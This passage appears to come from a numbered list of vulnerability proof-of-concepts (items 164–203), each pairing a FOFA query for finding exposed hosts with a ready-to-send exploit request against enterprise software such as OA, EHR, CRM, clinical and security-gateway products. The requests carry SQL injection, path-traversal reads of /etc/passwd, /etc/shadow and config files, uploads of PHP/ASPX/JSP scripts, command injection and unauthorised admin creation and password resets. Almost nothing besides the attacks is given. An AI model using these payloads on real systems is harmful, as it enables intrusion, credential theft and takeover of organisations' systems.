POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益 value management system (LVS) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"

------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 (Interlib) library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation installations.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 (LANWON) clinical viewing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. Short-video matrix marketing system (短视频矩阵营销系统) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科 (Hillstone) 云鉴 security management system setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 internet behavior management system send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. Henan 风速科技 unified authentication platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 (Aliyun Drive) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. cockpit assetsmanager_upload endpoint file upload

1. Run the PoC to obtain the CSRF token and then the cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 (Founder) all-media news editing system binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values in the request below:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云 (Redsea) EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type: image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--